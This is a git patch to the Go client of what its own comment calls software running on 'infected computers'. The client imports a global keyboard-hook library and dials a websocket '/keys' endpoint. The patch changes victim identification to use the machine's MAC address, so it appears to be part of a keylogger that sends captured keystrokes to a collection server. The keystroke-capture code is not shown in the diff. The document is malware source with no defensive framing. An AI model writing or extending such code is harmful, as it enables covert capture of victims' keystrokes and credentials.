From cf1127a3391668301c3d07328943842e98f1b175 Mon Sep 17 00:00:00 2001 From: Ash Svitan Date: Thu, 22 Jan 2026 11:20:53 +0100 Subject: [PATCH] :hammer: Refactors id generation/retrieval algorithm The client id is now either generated from the device MAC address (from a device that starts with w or e and is up and isn't loopback) or randomly generated --- client/go.mod | 2 +- client/go.sum | 4 ++-- client/main.go | 54 +++++++++++++++++++------------------------------- 3 files changed, 23 insertions(+), 37 deletions(-) diff --git a/client/go.mod b/client/go.mod index 7526276..9c718d5 100644 --- a/client/go.mod +++ b/client/go.mod @@ -5,7 +5,7 @@ go 1.24.1 require ( github.com/google/uuid v1.6.0 github.com/gorilla/websocket v1.5.3 - github.com/robotn/gohook v0.42.0 + github.com/robotn/gohook v0.42.3 ) require github.com/vcaesar/keycode v0.10.1 // indirect diff --git a/client/go.sum b/client/go.sum index cc88ea6..c807ac1 100644 --- a/client/go.sum +++ b/client/go.sum @@ -2,8 +2,8 @@ github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/gorilla/websocket v1.5.3 h1:saDtZ6Pbx/0u+bgYQ3q96pZgCzfhKXGPqt7kZ72aNNg= github.com/gorilla/websocket v1.5.3/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE= -github.com/robotn/gohook v0.42.0 h1:y241yJtt1JvObVwoS2kXJ5OsoIsOoVkp/SPqmCAUhJg= -github.com/robotn/gohook v0.42.0/go.mod h1:PYgH0f1EaxhCvNSqIVTfo+SIUh1MrM2Uhe2w7SvFJDE= +github.com/robotn/gohook v0.42.3 h1:6Pm6q4gOn+CNjDpiBTWqPwbCJF4+0WD/Fdizlztua2U= +github.com/robotn/gohook v0.42.3/go.mod h1:PYgH0f1EaxhCvNSqIVTfo+SIUh1MrM2Uhe2w7SvFJDE= github.com/vcaesar/keycode v0.10.1 h1:0DesGmMAPWpYTCYddOFiCMKCDKgNnwiQa2QXindVUHw= github.com/vcaesar/keycode v0.10.1/go.mod h1:JNlY7xbKsh+LAGfY2j4M3znVrGEm5W1R8s/Uv6BJcfQ= github.com/vcaesar/tt v0.20.1 h1:D/jUeeVCNbq3ad8M7hhtB3J9x5RZ6I1n1eZ0BJp7M+4= diff --git a/client/main.go b/client/main.go index e99c6ac..fce93f9 100644 --- a/client/main.go +++ b/client/main.go @@ -1,16 +1,16 @@ package main import ( + "bytes" + "encoding/hex" "fmt" - "io" + "math/rand" + "net" "net/url" "os" - "path/filepath" - "runtime" "strings" "time" - "github.com/google/uuid" "github.com/gorilla/websocket" hook "github.com/robotn/gohook" ) @@ -33,41 +33,27 @@ func log(msg string, formats ...any) { } } -// load id from same directory as executable from "keys.txt" -func getId() uuid.UUID { - var id = uuid.New() - if runtime.GOOS != "windows" { - return id - - } - ex, err := os.Executable() +// get mac address so we can differentiate between separate infected computers/clients +func getId() []byte { + interfaces, err := net.Interfaces() if err != nil { - return id - } - - file := filepath.Join(filepath.Dir(ex), "keys.txt") - stream, err := os.Open(file) - defer func() { _ = stream.Close() }() - if err != nil { - return id - } - - data, err := io.ReadAll(stream) - if err != nil { - return id - } - - loaded, err := uuid.Parse(string(data)) - if err != nil { - return id + panic(err) } else { - return loaded + for _, i := range interfaces { + if (strings.HasPrefix(strings.ToLower(i.Name), "e") || strings.HasPrefix(strings.ToLower(i.Name), "w")) && i.Flags&net.FlagUp != 0 && i.Flags&net.FlagLoopback == 0 && !bytes.Equal(i.HardwareAddr, nil) { + return i.HardwareAddr + } + } } + + id := make([]byte, 6) + rand.Read(id) + return id } func main() { id := getId() - var resource = url.URL{Scheme: "ws", Host: "localhost:8080", Path: fmt.Sprintf("/keys?id=%s", id)} + var resource = url.URL{Scheme: "ws", Host: "localhost:8080", Path: "/keys", RawQuery: fmt.Sprintf("id=%s", hex.EncodeToString(id))} debugRaw := strings.ToLower(os.Getenv("DEBUG")) debug = debugRaw == "true" || debugRaw == "1" || debugRaw == "yes" @@ -78,14 +64,14 @@ func main() { log("attempting to dial: %s\n", resource.String()) conn, _, err = websocket.DefaultDialer.Dial(resource.String(), nil) if err != nil { - log("dialing failed") + log("dialing failed\n") tries += 1 if tries >= 3 { return } time.Sleep(time.Second) } else { - log("dialnig succesful") + log("dialing succesful\n") break } }